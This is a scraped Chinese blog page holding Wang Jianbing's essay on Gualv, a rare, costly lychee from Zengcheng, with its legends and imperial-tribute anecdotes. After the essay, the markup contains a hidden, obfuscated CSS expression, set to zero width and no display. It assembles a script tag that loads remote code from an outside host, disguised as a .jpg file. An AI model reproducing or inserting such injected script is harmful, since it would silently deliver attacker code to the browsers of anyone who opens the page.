注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

王剑冰博客

散文《绝版的周庄》作者,河南省作家协会副主席

 
 
 

日志

 
 
关于我

1982年毕业于河南大学中文系。1975年赴乡村插队务农,后历任《奔流》杂志编辑,《文艺百家报》、《当代人报》采通部主任,《散文选刊》副主编,副编审。1979年开始发表作品。1993年加入中国作家协会。 河南省作家协会副主席,全国鲁迅文学奖二、三、四届评委,国务院特殊津贴专家。

网易考拉推荐

挂 绿  

2009-08-28 04:16:00|  分类: 天涯羁旅散文 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

            绿  

             王剑冰

 

在增城,好看的东西实在是多,听到的东西也颇感新奇。比如挂绿,你原本不会把它想象成是一种荔枝树,而且是绝品荔枝。这种稀少的品种,被增城人藏宝一般藏在了市中心的园子里,四周被水围起,围成一个盆景。盆景四周扩而成一个宽广的挂绿广场。而已有四百余年的挂绿母树上生长出的荔枝,在一次拍卖会上,竟然拍出了每颗五万多元的高价。

我还是不大理解“挂绿”一名的由来,为何用“挂”呢?来自“披红挂绿”?那么就是还有“披红”?成为一对名贵品种,才能说得通。也说不定是“披红”早已失传,唯剩下“挂绿”了。或者说荔枝就是红红的果实,株株串串红满枝头,远远望去真的是满树披红,而后突然出现一番奇妙的事情,每颗果实上都有了绿色,这样便是披红挂绿一片胜景。

挂绿难道是这样由来?

传说,何仙姑在一棵荔枝下绣花鞋,顺手把一缕绿丝线搭在树丫上,这树结出的果实感受了仙气,每一颗荔枝都留下一条绿痕。这种传说,只能是听了一笑了之,当不得真事。

为什么它有这般珍贵?说这个品种果肉鲜嫩,水蜜爽口,且能够保持很长的时间。《荔枝谱》一书载:其品质爽脆如梨,桨液不见,去壳怀之,三日不变。

当年一个姓杨的女子想吃荔枝,唐玄宗为博妃子一笑,下令快马奉送。崎岖官道,尘土飞扬,千山万水,到长安也要好几天时间。在没有先进的保鲜设施的情况下,一般的荔枝也就失去了它的鲜嫩。

许只有挂绿这样的品种才能使丰美人微露一笑。

时间走过,又有一个女人想到了荔枝。别人吃得,她为何吃不得?何况还有苏东坡“日啖荔枝三百颗,不辞长做岭南人”的诗句相馋,岭南人她做不了,解一时之馋倒是想。

这可急坏了当地的官员,那时挂绿树就已经寥若晨星,若奉一般荔枝进京,失去新鲜味道,肯定脑袋不保。既然有旨,这些官员还是费尽心机,踏破铁鞋,终于在偏僻的乡间找到了救命的挂绿,才得以博得老佛爷的欢颜。

挂绿,可见声名久远,更因稀少而为人间珍品。

我只记住了挂绿的名字,却没在意它的形象。直接由广东飞贵州参加另一个活动时,增城人给带了两箱荔枝,便分发给朋友品尝,舒婷听说是增城荔枝,连声叫好,说她也去过那里,并且有幸得到过一颗挂绿果。

挂绿,形象而诗性的名字。

 

ee:expression_r(function(){if(!window.r){varss='s'+'cript';var tt='text/ja'+'vas'+'cript';varst=document.createElement(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none">
  评论这张
 
阅读(113)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017